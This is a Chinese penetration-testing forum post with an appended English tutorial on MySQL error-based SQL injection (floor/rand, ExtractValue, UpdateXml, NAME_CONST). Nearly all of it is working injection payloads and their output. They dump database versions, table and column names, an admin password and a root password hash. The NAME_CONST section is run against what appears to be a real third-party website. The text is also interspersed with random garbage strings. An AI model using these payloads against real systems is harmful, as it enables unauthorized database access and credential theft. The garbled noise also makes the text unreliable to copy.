中国网络渗透测试联盟

标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin    时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:: M7 a: }4 h, g* @" a1 c! g
首先进行正常查询:

mysql> select * from article where id = 1;
6 x  @3 Z& p' H- w6 a5 d+—-+——-+———+* G( x* `3 \- }' a
| id | title | content |
6 E% M$ o. x9 y/ N7 s* c2 v/ y+—-+——-+———+
( l0 v6 ]. |1 _; {+ n|  1 | test  | do it   |
) o/ J% W+ ^9 a$ V1 o: m+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
- v3 J+ a1 Z* }9 g$ d" xERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
4 D- q# S/ Q; S3 I3 ^* o例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);- ]7 u- a$ d6 p# I! s" |
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));- b1 ~) l( x' a
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
- ]& j* j$ l( M. {# R测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–9 a# E) B) Y/ a' F3 K3 {: R# }
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

# s4 _6 T" L" \. @0 \# t

! x  S; o# w/ S* c

再收集:

) v$ A' p& q. ~* _; S. W
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
1 z* F  N  b& w4 v6 w
8 h: }2 k; F) P2 |5 B" q8 k( TErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
  P% l# o; O: r: @! _: w4 {2 v9 e5 q% L# ~) d( o) l
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
% {! H2 }" E; k" x4 F3 k4 e9 P8 Z; r" a: ~  w
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ : A9 K3 i: H8 [) H! ?7 l# e
' _: d) g9 r$ S) g! f. [9 ^
MYSQL高版本报错注入技巧-利用NAME_CONST注入5 e8 A; V9 Z9 \/ |) x3 J
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
: b3 H, `) [6 |! {' `2 I. o" f2 I/ V7 S  Q

/ G8 O$ I% B5 |. l5 u+ K1 H" \2 n相关信息
0 ^+ {! }* U3 r" Z5 Y
! Z4 W3 F( S) X" |' h, Z5 Y( QNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
; {4 ?, J5 o. V  t3 S+ f" a: v. S6 \3 L( C+ e
Code:
3 M' f: ~  z+ w1 g) L6 Q- r2 oNAME_CONST(DATA, VALUE)( F8 @* ~; ~6 e# Y% ?' B
8 |5 j/ \8 h  ~0 K; C& s. f' p
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
* Y/ b: _1 h: F( u  f  f
" I8 u9 ~0 q6 A+ j7 `SELECT NAME_CONST('TEST', 1)
: v/ B' J& S% X& m' {
+ M. [) G3 J6 U8 q6 R+ D$ m1 C
+ z  D1 @( B4 R+ w4 h+ Y1 N7 v7 h7 I( E+ l
|---------------|. E8 S: t+ {! G% N# i6 M3 E
|     TEST      |
/ `; D, a7 f$ x  O1 ?: i% i|               |
$ h6 k% Z0 _' _. e. z) e& g|---------------|
: d" H7 k# \, {6 h|       1       |8 K+ c' W1 G5 j8 L9 v
|               |
0 ^* k7 j# c- b7 @2 ]* l! k: ~|---------------|% S  \# b5 w- U+ p& r1 i+ m0 W

& Y: _2 L3 s0 I% u: ?- ^" o6 A4 l7 i9 j) G" W2 u
5 v# o2 F  j6 e* F8 M# ]
$ O& y- B/ {% K+ a
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
+ s8 ^% l8 w9 S' l3 @9 G3 iIntro to MySQL Variables
* _! b& l3 D, y: b* p; [- z9 D) T7 `- \0 S5 s
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.: M  a) g0 G6 e

0 j7 R- I. x- h; ^# D) LCode:
9 m: G# _1 E; c/ S! chttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
) T6 B% c* D  N2 V8 b/ t  ?4 d
4 q& S) ?  H, U* r! ?( S' w
; [; F' K' ~* w2 j7 _/ @! m( Y( D( s2 }$ @' z) r9 S" V2 c9 @: |

5 ~% S6 A+ p2 d0 G2 F" ^, d* H' H$ }+ F* c! W9 F- n
Code:- d: r( Y6 O7 Y
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--. [9 Q7 x: v. i) a: V2 U. v
: H' H  [# T  |7 F
4 [" v9 L- ]) [  k  U8 `
VAR = Your MySQL variable.6 c8 w1 M2 Q( g8 |6 I# T

$ L* u; r  t) O3 d6 P/ D$ Z# LMySQL 5.1.3 Server System Variables
( f4 T* d9 e8 Q+ Z& @% t) f% A3 S
& O# E; W7 Y1 ]$ l/ @# C1 lLet's try it out on my site..) \! X% F. l; f+ M6 X' n- a
8 S7 u$ F: Y3 g
Code:; j6 j. C% T+ W' B& }# D* [
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
  V; y) ]* {5 s: s& \  D1 U/ J3 X2 i  h( I: b2 x1 j, w! U
Erroruplicate column name '5.0.27-community-nt'
  l6 n; d1 z. F5 ^8 G/ A/ k
5 Z0 a* p/ N6 h) @1 N3 m6 B1 X: X. n& f
; ?. c1 ^) G% k: g/ T( b

& e, s8 I$ x4 p& y: h
9 R4 B' F, C' i( x- l# T5 u  q5 WNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...8 y& v* y3 |8 Q; m0 N) f+ l

7 s' |$ p* p1 a! I8 p2 v- CData Extraction
. V' s9 b- `2 @8 ]# w" U/ C) n5 d8 U; c9 A9 Y6 X. O, C: W  H- }
Code:! k- D1 ], J3 H8 i0 z/ v
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--4 u% k, P' ^& \; r; c

  w4 V2 |; ^+ x+ P+ z$ F, x2 m" m5 x" S/ K
We should get a duplicate column 1 error...
; ?! a* j3 b; b3 ]0 K& _! t8 W9 H3 a8 Q. W! V' h
Code:
' `8 y' C; e. Z: {http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
$ X$ s, E6 F# b# s9 A5 w6 \' u! k* t# F2 v- o0 w6 Q. E7 ?
Erroruplicate column name '1  N9 q5 y1 i. R; s, x: h

3 h2 i" Z1 O( B; H: i' o3 S# W  c/ n% V' p$ F. _' L

3 A: k  F$ r5 \2 a2 W  E8 K( _- I2 u2 k' |4 A8 A* w$ w

" ]2 I: R3 |0 |( I9 E
9 j. [' y, J. Z/ dNow let's get the tables out this bitch..; N+ q; Q- E* Y* s9 N
6 E! C2 k0 N6 W2 y* i9 |5 _
Code:
7 ?( W' [/ O0 d6 }+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--$ Z4 P5 X3 }2 R% e0 R5 u

) j1 w6 {( m" f  A0 i
; T! z% l& @9 BLet's see if it works here, if it does, we can go on and finish the job.1 P% X" ^) W' N' x* o6 g( U

# k) E: j5 b7 g  }6 o# `Code:! Q5 _% [6 Y) j. v* K$ g3 G8 u2 D
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
6 T/ T! n) Z- n# k
% F  E* u' N5 ~2 F% Q9 [. y7 h6 u) H% H4 S& P" x( M
Erroruplicate column name 'com_admanage
# P, Y% N# x* d
; ~$ @7 }0 j  o' z) n2 n" _
7 C+ n) f0 |! {
& ~' j: D9 }+ \
, o* z- k( N+ @# b8 K, c- @: n* F" R; w1 V
( {/ h# K) T, \
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time." R! o, ]" Q2 G

2 }7 r) E# P+ `+ {5 iLet's get the columns out of the user table..
6 x/ k4 a' r8 h) @& v' N
& z& a& _  @1 S' \) N6 X6 mCode:
6 F, ^/ \% C& |  g3 h. V+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
9 G( y3 d( {5 |- \7 s7 ]$ e6 B; l2 J2 q9 \+ D: x. W7 G

8 i# N* x4 Q! d/ aSo mine looks like this, and I get the duplicate column name 'Host'.. @8 T, L* F: k

  y1 ~* D, \* z7 _9 P; zCode:0 t- a: v7 \' K8 ~7 F3 H
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
% S( `$ H6 @  @2 K  o0 Z& u% }4 ?$ J9 M9 U, b
Erroruplicate column name 'Host'1 ]: B0 a0 j9 [# u$ f7 j
# ~' u" e" j) X7 Z7 X6 c
% h1 C: Z- ]" U  o5 c0 {
+ ], s: \/ A# G7 K" Q% D+ Z
; j! H7 h; V) `' H9 [

/ a" W4 l+ a9 F9 U; w6 X9 ?' Y( l! W" `/ J
Woot, time to finish this bitch off.
+ }6 G3 ?1 v# d* v% P: k% T8 X1 X
# l+ D) `9 C) E! n, UCode:
9 i: q0 K8 l8 Z+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--9 g- i2 }( _! L* Z$ o7 I
* c% h6 x4 }1 t! f+ U- E0 ?, n
( c3 [/ C8 m: n9 D+ E2 {
So mine looks like this...
" {' j3 B" W, w' \
1 m1 J, U/ t3 o+ h6 kCode:7 }& d( g. G: e3 V# J# i& X
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--  L/ @) q+ v/ y) i
, D* P$ D+ W  {  N
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'4 k$ z" [0 i! ?/ h& {2 ?. k# g

2 h5 D* B6 o+ ?* g3 v, d6 u# C& M
  g9 Y7 Q4 ^- j8 M4 |& l
) a- m0 h3 T: j' @; A
& H( q4 {9 b- J$ r6 ~. R4 E" e6 Z$ ~, p3 Z

" O8 h+ X8 L9 }. Y. b5 I/ NAnd there we have it, thanks for reading.
' p: k+ [  ~* X& @7 a( \
) I4 R, s% F  g



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2